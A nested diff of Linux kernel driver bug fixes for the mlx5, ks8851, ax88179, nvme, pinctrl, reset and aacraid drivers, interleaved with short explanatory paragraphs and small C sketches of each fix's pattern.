+index be83ad9db82a4..e1283531e0b81 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+@@ -154,6 +154,7 @@ static int fs_udp_create_groups(struct mlx5e_flow_table *ft, enum fs_udp_type ty
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+ 	if  (!in || !ft->g) {
+ 		kfree(ft->g);
++		ft->g = NULL;
+ 		kvfree(in);
+ 		return -ENOMEM;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+index 4db0483c066a8..83bb0811e7741 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+@@ -300,6 +300,9 @@ int mlx5e_tc_tun_create_header_ipv4(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto destroy_neigh_entry;
+ 
++	e->encap_size = ipv4_encap_size;
++	e->encap_header = encap_header;
++
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+@@ -319,8 +322,6 @@ int mlx5e_tc_tun_create_header_ipv4(struct mlx5e_priv *priv,
+ 		goto destroy_neigh_entry;
+ 	}
+ 
+-	e->encap_size = ipv4_encap_size;
+-	e->encap_header = encap_header;
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv4_put(&attr);
+@@ -403,12 +404,16 @@ int mlx5e_tc_tun_update_header_ipv4(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto free_encap;
+ 
++	e->encap_size = ipv4_encap_size;
++	kfree(e->encap_header);
++	e->encap_header = encap_header;
++
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+ 		 * and not used before that.
+ 		 */
+-		goto free_encap;
++		goto release_neigh;
+ 	}
+ 
+ 	memset(&reformat_params, 0, sizeof(reformat_params));
+@@ -422,10 +427,6 @@ int mlx5e_tc_tun_update_header_ipv4(struct mlx5e_priv *priv,
+ 		goto free_encap;
+ 	}
+ 
+-	e->encap_size = ipv4_encap_size;
+-	kfree(e->encap_header);
+-	e->encap_header = encap_header;
+-
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv4_put(&attr);
+@@ -567,6 +568,9 @@ int mlx5e_tc_tun_create_header_ipv6(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto destroy_neigh_entry;
+ 
++	e->encap_size = ipv6_encap_size;
++	e->encap_header = encap_header;
++
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+@@ -586,8 +590,6 @@ int mlx5e_tc_tun_create_header_ipv6(struct mlx5e_priv *priv,
+ 		goto destroy_neigh_entry;
+ 	}
+ 
+-	e->encap_size = ipv6_encap_size;
+-	e->encap_header = encap_header;
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv6_put(&attr);
+@@ -669,12 +671,16 @@ int mlx5e_tc_tun_update_header_ipv6(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto free_encap;
+ 
++	e->encap_size = ipv6_encap_size;
++	kfree(e->encap_header);
++	e->encap_header = encap_header;
++
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+ 		 * and not used before that.
+ 		 */
+-		goto free_encap;
++		goto release_neigh;
+ 	}
+ 
+ 	memset(&reformat_params, 0, sizeof(reformat_params));
+@@ -688,10 +694,6 @@ int mlx5e_tc_tun_update_header_ipv6(struct mlx5e_priv *priv,
+ 		goto free_encap;
+ 	}
+ 
+-	e->encap_size = ipv6_encap_size;
+-	kfree(e->encap_header);
+-	e->encap_header = encap_header;
+-
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv6_put(&attr);
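All four hunks in this file apply one ordering fix: e->encap_size and e->encap_header are published before the !NUD_VALID early exit, and the update paths jump to release_neigh rather than free_encap, so the entry keeps ownership of the buffer the later neigh-update will use instead of freeing it out from under itself. A compact sketch of that ownership-transfer pattern with goto-style cleanup (names illustrative):

    #include <stdlib.h>

    struct entry { void *hdr; };

    static int update(struct entry *e, int neigh_valid)
    {
        void *hdr = malloc(64);

        if (!hdr)
            return -1;      /* allocation failed: nothing transferred yet */

        free(e->hdr);       /* transfer ownership to the entry first */
        e->hdr = hdr;

        if (!neigh_valid)
            goto release_neigh;   /* not a free path: e->hdr must survive */

        /* ... program the hardware using e->hdr ... */
    release_neigh:
        return 0;
    }

    int main(void)
    {
        struct entry e = { 0 };

        update(&e, 0);
        free(e.hdr);
        return 0;
    }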
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+index eeba91d9c5211..ceeb23f478e15 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+@@ -49,7 +49,7 @@ void mlx5e_ethtool_get_drvinfo(struct mlx5e_priv *priv,
+ 	count = snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+ 			 "%d.%d.%04d (%.16s)", fw_rev_maj(mdev),
+ 			 fw_rev_min(mdev), fw_rev_sub(mdev), mdev->board_id);
+-	if (count == sizeof(drvinfo->fw_version))
++	if (count >= sizeof(drvinfo->fw_version))
+ 		snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+ 			 "%d.%d.%04d", fw_rev_maj(mdev),
+ 			 fw_rev_min(mdev), fw_rev_sub(mdev));
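snprintf() returns the length the formatted string would have had, so truncation shows up as any return value greater than or equal to the buffer size; the old `==` test caught only the exact-fit boundary. The identical fix lands in the representor variant in the next hunk. A standalone demonstration:

    #include <stdio.h>

    int main(void)
    {
        char buf[8];
        int count = snprintf(buf, sizeof(buf), "%s", "0123456789");

        /* count is 10 here, well past sizeof(buf) == 8 */
        if (count >= (int)sizeof(buf))
            snprintf(buf, sizeof(buf), "%s", "short");   /* fallback */
        printf("%s\n", buf);
        return 0;
    }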
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 2653cb96c3105..5aeca9534f15a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -76,7 +76,7 @@ static void mlx5e_rep_get_drvinfo(struct net_device *dev,
+ 	count = snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+ 			 "%d.%d.%04d (%.16s)", fw_rev_maj(mdev),
+ 			 fw_rev_min(mdev), fw_rev_sub(mdev), mdev->board_id);
+-	if (count == sizeof(drvinfo->fw_version))
++	if (count >= sizeof(drvinfo->fw_version))
+ 		snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+ 			 "%d.%d.%04d", fw_rev_maj(mdev),
+ 			 fw_rev_min(mdev), fw_rev_sub(mdev));
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c
+index d5c3173250309..3f68e3198aa64 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/vport.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c
+@@ -277,7 +277,7 @@ int mlx5_query_nic_vport_mac_list(struct mlx5_core_dev *dev,
+ 		req_list_size = max_list_size;
+ 	}
+ 
+-	out_sz = MLX5_ST_SZ_BYTES(query_nic_vport_context_in) +
++	out_sz = MLX5_ST_SZ_BYTES(query_nic_vport_context_out) +
+ 			req_list_size * MLX5_ST_SZ_BYTES(mac_address_layout);
+ 
+ 	out = kvzalloc(out_sz, GFP_KERNEL);
+diff --git a/drivers/net/ethernet/micrel/ks8851.h b/drivers/net/ethernet/micrel/ks8851.h
+index fecd43754cead..e5ec0a363aff8 100644
+--- a/drivers/net/ethernet/micrel/ks8851.h
++++ b/drivers/net/ethernet/micrel/ks8851.h
+@@ -350,6 +350,8 @@ union ks8851_tx_hdr {
+  * @rxd: Space for receiving SPI data, in DMA-able space.
+  * @txd: Space for transmitting SPI data, in DMA-able space.
+  * @msg_enable: The message flags controlling driver output (see ethtool).
++ * @tx_space: Free space in the hardware TX buffer (cached copy of KS_TXMIR).
++ * @queued_len: Space required in hardware TX buffer for queued packets in txq.
+  * @fid: Incrementing frame id tag.
+  * @rc_ier: Cached copy of KS_IER.
+  * @rc_ccr: Cached copy of KS_CCR.
+@@ -399,6 +401,7 @@ struct ks8851_net {
+ 	struct work_struct	rxctrl_work;
+ 
+ 	struct sk_buff_head	txq;
++	unsigned int		queued_len;
+ 
+ 	struct eeprom_93cx6	eeprom;
+ 	struct regulator	*vdd_reg;
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index cfbc900d4aeb9..0bf13b38b8f5b 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
+@@ -362,16 +362,18 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 		handled |= IRQ_RXPSI;
+ 
+ 	if (status & IRQ_TXI) {
+-		handled |= IRQ_TXI;
++		unsigned short tx_space = ks8851_rdreg16(ks, KS_TXMIR);
+ 
+-		/* no lock here, tx queue should have been stopped */
++		netif_dbg(ks, intr, ks->netdev,
++			  "%s: txspace %d\n", __func__, tx_space);
+ 
+-		/* update our idea of how much tx space is available to the
+-		 * system */
+-		ks->tx_space = ks8851_rdreg16(ks, KS_TXMIR);
++		spin_lock(&ks->statelock);
++		ks->tx_space = tx_space;
++		if (netif_queue_stopped(ks->netdev))
++			netif_wake_queue(ks->netdev);
++		spin_unlock(&ks->statelock);
+ 
+-		netif_dbg(ks, intr, ks->netdev,
+-			  "%s: txspace %d\n", __func__, ks->tx_space);
++		handled |= IRQ_TXI;
+ 	}
+ 
+ 	if (status & IRQ_RXI)
+@@ -414,9 +416,6 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	if (status & IRQ_LCI)
+ 		mii_check_link(&ks->mii);
+ 
+-	if (status & IRQ_TXI)
+-		netif_wake_queue(ks->netdev);
+-
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -500,6 +499,7 @@ static int ks8851_net_open(struct net_device *dev)
+ 	ks8851_wrreg16(ks, KS_ISR, ks->rc_ier);
+ 	ks8851_wrreg16(ks, KS_IER, ks->rc_ier);
+ 
++	ks->queued_len = 0;
+ 	netif_start_queue(ks->netdev);
+ 
+ 	netif_dbg(ks, ifup, ks->netdev, "network device up\n");
+diff --git a/drivers/net/ethernet/micrel/ks8851_spi.c b/drivers/net/ethernet/micrel/ks8851_spi.c
+index 70bc7253454f6..88e26c120b483 100644
+--- a/drivers/net/ethernet/micrel/ks8851_spi.c
++++ b/drivers/net/ethernet/micrel/ks8851_spi.c
+@@ -286,6 +286,18 @@ static void ks8851_wrfifo_spi(struct ks8851_net *ks, struct sk_buff *txp,
+ 		netdev_err(ks->netdev, "%s: spi_sync() failed\n", __func__);
+ }
+ 
++/**
++ * calc_txlen - calculate size of message to send packet
++ * @len: Length of data
++ *
++ * Returns the size of the TXFIFO message needed to send
++ * this packet.
++ */
++static unsigned int calc_txlen(unsigned int len)
++{
++	return ALIGN(len + 4, 4);
++}
++
+ /**
+  * ks8851_rx_skb_spi - receive skbuff
+  * @ks: The device state
+@@ -305,7 +317,9 @@ static void ks8851_rx_skb_spi(struct ks8851_net *ks, struct sk_buff *skb)
+  */
+ static void ks8851_tx_work(struct work_struct *work)
+ {
++	unsigned int dequeued_len = 0;
+ 	struct ks8851_net_spi *kss;
++	unsigned short tx_space;
+ 	struct ks8851_net *ks;
+ 	unsigned long flags;
+ 	struct sk_buff *txb;
+@@ -322,6 +336,8 @@ static void ks8851_tx_work(struct work_struct *work)
+ 		last = skb_queue_empty(&ks->txq);
+ 
+ 		if (txb) {
++			dequeued_len += calc_txlen(txb->len);
++
+ 			ks8851_wrreg16_spi(ks, KS_RXQCR,
+ 					   ks->rc_rxqcr | RXQCR_SDA);
+ 			ks8851_wrfifo_spi(ks, txb, last);
+@@ -332,6 +348,13 @@ static void ks8851_tx_work(struct work_struct *work)
+ 		}
+ 	}
+ 
++	tx_space = ks8851_rdreg16_spi(ks, KS_TXMIR);
++
++	spin_lock(&ks->statelock);
++	ks->queued_len -= dequeued_len;
++	ks->tx_space = tx_space;
++	spin_unlock(&ks->statelock);
++
+ 	ks8851_unlock_spi(ks, &flags);
+ }
+ 
+@@ -346,18 +369,6 @@ static void ks8851_flush_tx_work_spi(struct ks8851_net *ks)
+ 	flush_work(&kss->tx_work);
+ }
+ 
+-/**
+- * calc_txlen - calculate size of message to send packet
+- * @len: Length of data
+- *
+- * Returns the size of the TXFIFO message needed to send
+- * this packet.
+- */
+-static unsigned int calc_txlen(unsigned int len)
+-{
+-	return ALIGN(len + 4, 4);
+-}
+-
+ /**
+  * ks8851_start_xmit_spi - transmit packet using SPI
+  * @skb: The buffer to transmit
+@@ -386,16 +397,17 @@ static netdev_tx_t ks8851_start_xmit_spi(struct sk_buff *skb,
+ 
+ 	spin_lock(&ks->statelock);
+ 
+-	if (needed > ks->tx_space) {
++	if (ks->queued_len + needed > ks->tx_space) {
+ 		netif_stop_queue(dev);
+ 		ret = NETDEV_TX_BUSY;
+ 	} else {
+-		ks->tx_space -= needed;
++		ks->queued_len += needed;
+ 		skb_queue_tail(&ks->txq, skb);
+ 	}
+ 
+ 	spin_unlock(&ks->statelock);
+-	schedule_work(&kss->tx_work);
++	if (ret == NETDEV_TX_OK)
++		schedule_work(&kss->tx_work);
+ 
+ 	return ret;
+ }
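The ks8851 rework replaces "subtract from a cached tx_space at queue time" with explicit bookkeeping: queued_len counts bytes committed to txq but not yet written to the FIFO, the worker subtracts what it drained and re-reads the real free space, and xmit stops the queue when queued_len plus the new frame would exceed tx_space. A minimal sketch of that admission check, including the FIFO message-size rounding (single-threaded here; the driver serializes this under statelock):

    #include <stdio.h>

    #define ALIGN4(x) (((x) + 3U) & ~3U)

    /* TXFIFO message: 4-byte header plus the padded payload. */
    static unsigned int calc_txlen(unsigned int len)
    {
        return ALIGN4(len + 4);
    }

    int main(void)
    {
        unsigned int tx_space = 2048;    /* last value read from hardware */
        unsigned int queued_len = 1800;  /* committed but not yet written */
        unsigned int needed = calc_txlen(300);

        if (queued_len + needed > tx_space)
            printf("stop queue, NETDEV_TX_BUSY\n");
        else
            printf("accept, queued_len -> %u\n", queued_len + needed);
        return 0;
    }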
+diff --git a/drivers/net/ethernet/microsoft/Kconfig b/drivers/net/ethernet/microsoft/Kconfig
+index fe4e7a7d9c0b5..8b6c4cc37c53c 100644
+--- a/drivers/net/ethernet/microsoft/Kconfig
++++ b/drivers/net/ethernet/microsoft/Kconfig
+@@ -19,6 +19,7 @@ config MICROSOFT_MANA
+ 	tristate "Microsoft Azure Network Adapter (MANA) support"
+ 	depends on PCI_MSI && X86_64
+ 	depends on PCI_HYPERV
++	select PAGE_POOL
+ 	help
+ 	  This driver supports Microsoft Azure Network Adapter (MANA).
+ 	  So far, the driver is only supported on X86_64.
+diff --git a/drivers/net/ethernet/mscc/ocelot_stats.c b/drivers/net/ethernet/mscc/ocelot_stats.c
+index 0066219bb0e89..6b95262dad904 100644
+--- a/drivers/net/ethernet/mscc/ocelot_stats.c
++++ b/drivers/net/ethernet/mscc/ocelot_stats.c
+@@ -216,10 +216,10 @@ static void ocelot_port_rmon_stats_cb(struct ocelot *ocelot, int port, void *pri
+ 	rmon_stats->hist_tx[0] = s[OCELOT_STAT_TX_64];
+ 	rmon_stats->hist_tx[1] = s[OCELOT_STAT_TX_65_127];
+ 	rmon_stats->hist_tx[2] = s[OCELOT_STAT_TX_128_255];
+-	rmon_stats->hist_tx[3] = s[OCELOT_STAT_TX_128_255];
+-	rmon_stats->hist_tx[4] = s[OCELOT_STAT_TX_256_511];
+-	rmon_stats->hist_tx[5] = s[OCELOT_STAT_TX_512_1023];
+-	rmon_stats->hist_tx[6] = s[OCELOT_STAT_TX_1024_1526];
++	rmon_stats->hist_tx[3] = s[OCELOT_STAT_TX_256_511];
++	rmon_stats->hist_tx[4] = s[OCELOT_STAT_TX_512_1023];
++	rmon_stats->hist_tx[5] = s[OCELOT_STAT_TX_1024_1526];
++	rmon_stats->hist_tx[6] = s[OCELOT_STAT_TX_1527_MAX];
+ }
+ 
+ void ocelot_port_get_rmon_stats(struct ocelot *ocelot, int port,
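The ocelot hunk is an off-by-one repair: bucket 3 duplicated the 128-255 counter, shifting every larger bucket down one slot and dropping the 1527+ counter entirely. A sketch of the intended one-to-one mapping (counter names illustrative):

    #include <stdio.h>

    enum { TX_64, TX_65_127, TX_128_255, TX_256_511,
           TX_512_1023, TX_1024_1526, TX_1527_MAX, TX_NSTATS };

    int main(void)
    {
        unsigned long long s[TX_NSTATS] = { 1, 2, 3, 4, 5, 6, 7 };
        unsigned long long hist[TX_NSTATS];
        int i;

        /* Each histogram slot maps to exactly one counter, in order. */
        for (i = 0; i < TX_NSTATS; i++)
            hist[i] = s[i];

        for (i = 0; i < TX_NSTATS; i++)
            printf("hist_tx[%d] = %llu\n", i, hist[i]);
        return 0;
    }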
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 4ea0e155bb0d5..5a1bf42ce1566 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -173,6 +173,7 @@ struct ax88179_data {
+ 	u8 in_pm;
+ 	u32 wol_supported;
+ 	u32 wolopts;
++	u8 disconnecting;
+ };
+ 
+ struct ax88179_int_data {
+@@ -208,6 +209,7 @@ static int __ax88179_read_cmd(struct usbnet *dev, u8 cmd, u16 value, u16 index,
+ {
+ 	int ret;
+ 	int (*fn)(struct usbnet *, u8, u8, u16, u16, void *, u16);
++	struct ax88179_data *ax179_data = dev->driver_priv;
+ 
+ 	BUG_ON(!dev);
+ 
+@@ -219,7 +221,7 @@ static int __ax88179_read_cmd(struct usbnet *dev, u8 cmd, u16 value, u16 index,
+ 	ret = fn(dev, cmd, USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 		 value, index, data, size);
+ 
+-	if (unlikely(ret < 0))
++	if (unlikely((ret < 0) && !(ret == -ENODEV && ax179_data->disconnecting)))
+ 		netdev_warn(dev->net, "Failed to read reg index 0x%04x: %d\n",
+ 			    index, ret);
+ 
+@@ -231,6 +233,7 @@ static int __ax88179_write_cmd(struct usbnet *dev, u8 cmd, u16 value, u16 index,
+ {
+ 	int ret;
+ 	int (*fn)(struct usbnet *, u8, u8, u16, u16, const void *, u16);
++	struct ax88179_data *ax179_data = dev->driver_priv;
+ 
+ 	BUG_ON(!dev);
+ 
+@@ -242,7 +245,7 @@ static int __ax88179_write_cmd(struct usbnet *dev, u8 cmd, u16 value, u16 index,
+ 	ret = fn(dev, cmd, USB_DIR_OUT | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 		 value, index, data, size);
+ 
+-	if (unlikely(ret < 0))
++	if (unlikely((ret < 0) && !(ret == -ENODEV && ax179_data->disconnecting)))
+ 		netdev_warn(dev->net, "Failed to write reg index 0x%04x: %d\n",
+ 			    index, ret);
+ 
+@@ -492,6 +495,20 @@ static int ax88179_resume(struct usb_interface *intf)
+ 	return usbnet_resume(intf);
+ }
+ 
++static void ax88179_disconnect(struct usb_interface *intf)
++{
++	struct usbnet *dev = usb_get_intfdata(intf);
++	struct ax88179_data *ax179_data;
++
++	if (!dev)
++		return;
++
++	ax179_data = dev->driver_priv;
++	ax179_data->disconnecting = 1;
++
++	usbnet_disconnect(intf);
++}
++
+ static void
+ ax88179_get_wol(struct net_device *net, struct ethtool_wolinfo *wolinfo)
+ {
+@@ -1906,7 +1923,7 @@ static struct usb_driver ax88179_178a_driver = {
+ 	.suspend =	ax88179_suspend,
+ 	.resume =	ax88179_resume,
+ 	.reset_resume =	ax88179_resume,
+-	.disconnect =	usbnet_disconnect,
++	.disconnect =	ax88179_disconnect,
+ 	.supports_autosuspend = 1,
+ 	.disable_hub_initiated_lpm = 1,
+ };
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 39ab6526e6b85..796972f224326 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -3034,7 +3034,7 @@ static u32 iwl_trans_pcie_dump_rbs(struct iwl_trans *trans,
+ 	struct iwl_rxq *rxq = &trans_pcie->rxq[0];
+ 	u32 i, r, j, rb_len = 0;
+ 
+-	spin_lock(&rxq->lock);
++	spin_lock_bh(&rxq->lock);
+ 
+ 	r = le16_to_cpu(iwl_get_closed_rb_stts(trans, rxq)) & 0x0FFF;
+ 
+@@ -3058,7 +3058,7 @@ static u32 iwl_trans_pcie_dump_rbs(struct iwl_trans *trans,
+ 		*data = iwl_fw_error_next_data(*data);
+ 	}
+ 
+-	spin_unlock(&rxq->lock);
++	spin_unlock_bh(&rxq->lock);
+ 
+ 	return rb_len;
+ }
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index eb7c87b344b8f..5b906dbb1096c 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4835,6 +4835,8 @@ static void nvme_fw_act_work(struct work_struct *work)
+ 				struct nvme_ctrl, fw_act_work);
+ 	unsigned long fw_act_timeout;
+ 
++	nvme_auth_stop(ctrl);
++
+ 	if (ctrl->mtfa)
+ 		fw_act_timeout = jiffies +
+ 				msecs_to_jiffies(ctrl->mtfa * 100);
+@@ -4890,7 +4892,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 		 * firmware activation.
+ 		 */
+ 		if (nvme_change_ctrl_state(ctrl, NVME_CTRL_RESETTING)) {
+-			nvme_auth_stop(ctrl);
+ 			requeue = false;
+ 			queue_work(nvme_wq, &ctrl->fw_act_work);
+ 		}
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index f71c6457e3509..2425d4813c3c5 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1033,6 +1033,13 @@ static const struct of_device_id atmel_pctrl_of_match[] = {
+ 	}
+ };
+ 
++/*
++ * This lock class allows to tell lockdep that parent IRQ and children IRQ do
++ * not share the same class so it does not raise false positive
++ */
++static struct lock_class_key atmel_lock_key;
++static struct lock_class_key atmel_request_key;
++
+ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+@@ -1185,6 +1192,7 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 		irq_set_chip_and_handler(irq, &atmel_gpio_irq_chip,
+ 					 handle_simple_irq);
+ 		irq_set_chip_data(irq, atmel_pioctrl);
++		irq_set_lockdep_class(irq, &atmel_lock_key, &atmel_request_key);
+ 		dev_dbg(dev,
+ 			"atmel gpio irq domain: hwirq: %d, linux irq: %d\n",
+ 			i, irq);
+diff --git a/drivers/pinctrl/starfive/pinctrl-starfive-jh7100.c b/drivers/pinctrl/starfive/pinctrl-starfive-jh7100.c
+index 5b544fb7f3d88..3b18a03075f46 100644
+--- a/drivers/pinctrl/starfive/pinctrl-starfive-jh7100.c
++++ b/drivers/pinctrl/starfive/pinctrl-starfive-jh7100.c
+@@ -489,7 +489,7 @@ static int starfive_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 
+ 	nmaps = 0;
+ 	ngroups = 0;
+-	for_each_child_of_node(np, child) {
++	for_each_available_child_of_node(np, child) {
+ 		int npinmux = of_property_count_u32_elems(child, "pinmux");
+ 		int npins   = of_property_count_u32_elems(child, "pins");
+ 
+@@ -524,7 +524,7 @@ static int starfive_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	nmaps = 0;
+ 	ngroups = 0;
+ 	mutex_lock(&sfp->mutex);
+-	for_each_child_of_node(np, child) {
++	for_each_available_child_of_node(np, child) {
+ 		int npins;
+ 		int i;
+ 
+diff --git a/drivers/reset/core.c b/drivers/reset/core.c
+index f0a076e94118f..92cc13ef3e566 100644
+--- a/drivers/reset/core.c
++++ b/drivers/reset/core.c
+@@ -807,6 +807,9 @@ static void __reset_control_put_internal(struct reset_control *rstc)
+ {
+ 	lockdep_assert_held(&reset_list_mutex);
+ 
++	if (IS_ERR_OR_NULL(rstc))
++		return;
++
+ 	kref_put(&rstc->refcnt, __reset_control_release);
+ }
+ 
+@@ -1017,11 +1020,8 @@ EXPORT_SYMBOL_GPL(reset_control_put);
+ void reset_control_bulk_put(int num_rstcs, struct reset_control_bulk_data *rstcs)
+ {
+ 	mutex_lock(&reset_list_mutex);
+-	while (num_rstcs--) {
+-		if (IS_ERR_OR_NULL(rstcs[num_rstcs].rstc))
+-			continue;
++	while (num_rstcs--)
+ 		__reset_control_put_internal(rstcs[num_rstcs].rstc);
+-	}
+ 	mutex_unlock(&reset_list_mutex);
+ }
+ EXPORT_SYMBOL_GPL(reset_control_bulk_put);
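Folding the IS_ERR_OR_NULL test into __reset_control_put_internal() makes the put path tolerant of error and NULL cookies for every caller, in the spirit of kfree(NULL) being a no-op, which is what lets the bulk loop above shed its per-element guard. The pattern in plain C:

    #include <stdlib.h>

    struct ref { int refcnt; };

    /* NULL-tolerant put: callers never need their own guard. */
    static void ref_put(struct ref *r)
    {
        if (!r)
            return;
        if (--r->refcnt == 0)
            free(r);
    }

    int main(void)
    {
        struct ref *r = malloc(sizeof(*r));

        if (r)
            r->refcnt = 1;
        ref_put(r);     /* drops the last reference */
        ref_put(NULL);  /* harmless, like free(NULL) */
        return 0;
    }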
+diff --git a/drivers/scsi/aacraid/aacraid.h b/drivers/scsi/aacraid/aacraid.h
+index 7c6efde75da66..5e115e8b2ba46 100644
+--- a/drivers/scsi/aacraid/aacraid.h
++++ b/drivers/scsi/aacraid/aacraid.h
+@@ -1678,7 +1678,6 @@ struct aac_dev
+ 	u32			handle_pci_error;
+ 	bool			init_reset;
+ 	u8			soft_reset_support;
+-	u8			use_map_queue;
+ };
+ 
+ #define aac_adapter_interrupt(dev) \
+diff --git a/drivers/scsi/aacraid/commsup.c b/drivers/scsi/aacraid/commsup.c
+index 013a9a334972e..25cee03d7f973 100644
+--- a/drivers/scsi/aacraid/commsup.c
++++ b/drivers/scsi/aacraid/commsup.c
+@@ -223,12 +223,8 @@ int aac_fib_setup(struct aac_dev * dev)
+ struct fib *aac_fib_alloc_tag(struct aac_dev *dev, struct scsi_cmnd *scmd)
+ {
+ 	struct fib *fibptr;
+-	u32 blk_tag;
+-	int i;
+ 
+-	blk_tag = blk_mq_unique_tag(scsi_cmd_to_rq(scmd));
+-	i = blk_mq_unique_tag_to_tag(blk_tag);
+-	fibptr = &dev->fibs[i];
++	fibptr = &dev->fibs[scsi_cmd_to_rq(scmd)->tag];
+ 	/*
+ 	 *	Null out fields that depend on being zero at the start of
+ 	 *	each I/O
+diff --git a/drivers/scsi/aacraid/linit.c b/drivers/scsi/aacraid/linit.c
+index bff49b8ab057d..5ba5c18b77b46 100644
+--- a/drivers/scsi/aacraid/linit.c
++++ b/drivers/scsi/aacraid/linit.c
+@@ -19,7 +19,6 @@
+ 
+ #include <linux/compat.h>
+ #include <linux/blkdev.h>
+-#include <linux/blk-mq-pci.h>
+ #include <linux/completion.h>
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+@@ -506,15 +505,6 @@ common_config:
+ 	return 0;
+ }
+ 
+-static void aac_map_queues(struct Scsi_Host *shost)
+-{
+-	struct aac_dev *aac = (struct aac_dev *)shost->hostdata;
+-
+-	blk_mq_pci_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT],
+-			      aac->pdev, 0);
+-	aac->use_map_queue = true;
+-}
+-
+ /**
+  *	aac_change_queue_depth		-	alter queue depths
+  *	@sdev:	SCSI device we are considering
+@@ -1499,7 +1489,6 @@ static struct scsi_host_template aac_driver_template = {
+ 	.bios_param			= aac_biosparm,
+ 	.shost_groups			= aac_host_groups,
+ 	.slave_configure		= aac_slave_configure,
+-	.map_queues			= aac_map_queues,
+ 	.change_queue_depth		= aac_change_queue_depth,
+ 	.sdev_groups			= aac_dev_groups,
+ 	.eh_abort_handler		= aac_eh_abort,
+@@ -1787,8 +1776,6 @@ static int aac_probe_one(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	shost->max_lun = AAC_MAX_LUN;
+ 
+ 	pci_set_drvdata(pdev, shost);
+-	shost->nr_hw_queues = aac->max_msix;
+-	shost->host_tagset = 1;
+ 
+ 	error = scsi_add_host(shost, &pdev->dev);
+ 	if (error)
+@@ -1921,7 +1908,6 @@ static void aac_remove_one(struct pci_dev *pdev)
+ 	struct aac_dev *aac = (struct aac_dev *)shost->hostdata;
+ 
